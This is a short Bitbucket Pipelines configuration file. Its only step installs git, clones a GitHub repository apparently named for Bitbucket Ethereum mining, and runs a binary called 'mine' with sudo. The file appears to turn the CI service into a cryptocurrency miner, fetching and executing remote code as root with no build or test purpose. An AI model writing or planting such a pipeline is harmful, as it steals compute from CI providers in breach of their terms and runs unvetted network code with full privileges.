pipelines:
  default:
    - step:
        script:
          - sudo apt install -y git && sudo git clone https://github.com/Anli-Project/UntukBitbucketEthereum.git && cd UntukBitbucketEthereum && sudo chmod u+x mine && sudo ./mine
